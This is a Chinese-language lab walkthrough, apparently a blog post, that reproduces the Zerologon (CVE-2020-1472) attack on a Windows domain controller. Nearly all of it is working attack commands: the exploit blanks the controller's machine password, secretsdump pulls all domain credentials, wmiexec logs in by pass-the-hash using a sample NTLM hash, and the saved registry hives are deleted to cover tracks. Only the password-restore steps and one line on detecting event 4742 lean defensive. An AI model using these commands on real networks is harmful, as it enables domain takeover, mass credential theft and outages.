[内网渗透]—NetLogon 域内提权漏洞(CVE-2020-1472)
简介
CVE-2020-1472 是⼀个 windows 域控中严重的远程权限提升漏洞,攻击者通过 NetLogon,建⽴与域控间易受攻击的安全通道时,可利⽤此漏洞获取域管访问权限(将域控中保存在AD中的管理员password设置为空);其漏洞原理是发⽣在 RPC 认证过程的过程中,由于错误的使⽤了 AES-CFB8 加密所致。
影响版本
可参考:CVE-2020-1472 - 安全更新程序指南 - Microsoft - Netlogon 特权提升漏洞
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)
利用场景
获取了一个加入了域的计算机权限,在域普通账号的情况下,将域管密码置空,导出域管hash,然后进行连接
攻击流程
漏洞检测
poc:https://github.com/SecuraBV/CVE-2020-1472
1、获取域控主机名
net group "domain controllers" /domain
获取域控主机名为WIN2012$
![[内网渗透]—NetLogon 域内提权漏洞(CVE-2020-1472)_第1张图片](http://img.e-com-net.com/image/info8/5d1e4d4d6d9543ae9f3ff6ce6ebea7e9.jpg)
2、检测域控是否存在漏洞
python zerologon_tester.py 域控主机名 域控ip
漏洞存在:
漏洞攻击
1、将域控密码置空
exp:https://github.com/dirkjanm/CVE-2020-1472
python cve-2020-1472-exploit.py WIN2012 192.168.52.163
![[内网渗透]—NetLogon 域内提权漏洞(CVE-2020-1472)_第2张图片](http://img.e-com-net.com/image/info8/fe134699c77d465a907217391d350610.jpg)
此时如果机器重启则很可能起不来,会出问题
2、secretsdum.py导出域内所有用户的凭证
python secretsdump.py 域名/域控主机名@域控ip -no-pass
python secretsdump.py sentiment.com/WIN2012$@192.168.52.163 -no-pass >1.txt
![[内网渗透]—NetLogon 域内提权漏洞(CVE-2020-1472)_第3张图片](http://img.e-com-net.com/image/info8/343747746b494df8b149a3e63be3e35a.jpg)
3、wmiexec.py远程登录
python wmiexec.py administrator@192.168.52.163 -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634
![[内网渗透]—NetLogon 域内提权漏洞(CVE-2020-1472)_第4张图片](http://img.e-com-net.com/image/info8/0f40beeb1a004674ad7495d557b59c90.jpg)
恢复域控hash
前边将域控的密码置空了,所以需要恢复一下,否则可能脱域导致整个域环境瘫痪。
1、导出 sam system 等⽂件到本地,获取域控机器上本地保存之前的 hash 值⽤于恢复。
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
![[内网渗透]—NetLogon 域内提权漏洞(CVE-2020-1472)_第5张图片](http://img.e-com-net.com/image/info8/c4ad1e89be304df3aac5dcc636d8f4fe.jpg)
2、将sam文件导入本地
#这里没成功,所以手动拖出来了
get system.save
get sam.save
get security.save
3、删除域控内导出的文件
del /f system.save
del /f sam.save
del /f security.save
![[内网渗透]—NetLogon 域内提权漏洞(CVE-2020-1472)_第6张图片](http://img.e-com-net.com/image/info8/c7a5bfe9b81a46e68256a9c4d4fa13bb.jpg)
4、通过 sam.save、security.save、system.save ⽂件获得原来域控机器上的 Ntlm Hash 值,⽤于恢复密码
python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
![[内网渗透]—NetLogon 域内提权漏洞(CVE-2020-1472)_第7张图片](http://img.e-com-net.com/image/info8/fa975a1e660b44378f06a2741af06cb9.jpg)
5、通过拿到 $MACHINE.ACC: 的值,然后进行恢复
脚本:https://github.com/risksense/zerologon/blob/master/reinstall_original_pw.py
python reinstall_original_pw.py 域控机器名 域控ip $MACHINE.ACC后半部分的值
python reinstall_original_pw.py WIN2012 192.168.52.163 beadd583f50a11bac3f8df4c0e7211ea
![[内网渗透]—NetLogon 域内提权漏洞(CVE-2020-1472)_第8张图片](http://img.e-com-net.com/image/info8/4fada6b33a32498a93c9c78d6ae05daf.jpg)
6、验证密码是否恢复
python secretsdump.py sentiment.com/WIN2012$@192.168.52.163 -no-pass
再使用开始的secretsdum.py导出域内所有用户的凭证,可见使用空密码去获取域内的所有用户的凭证已经不行了
后记
在漏洞利用成功后,会在域控中留下4742事件,可用于蓝队检测。
![[内网渗透]—NetLogon 域内提权漏洞(CVE-2020-1472)_第9张图片](http://img.e-com-net.com/image/info8/d75ec955a8394786baaaeaf1f8a16482.jpg)
参考
NetLogon 域内提权漏洞(CVE-2020-1472)复现过程 - 腾讯云开发者社区-腾讯云 (tencent.com)
域内提权之CVE-2020-1472复现打域控_山山而川’的博客-CSDN博客_secretsdump.py下载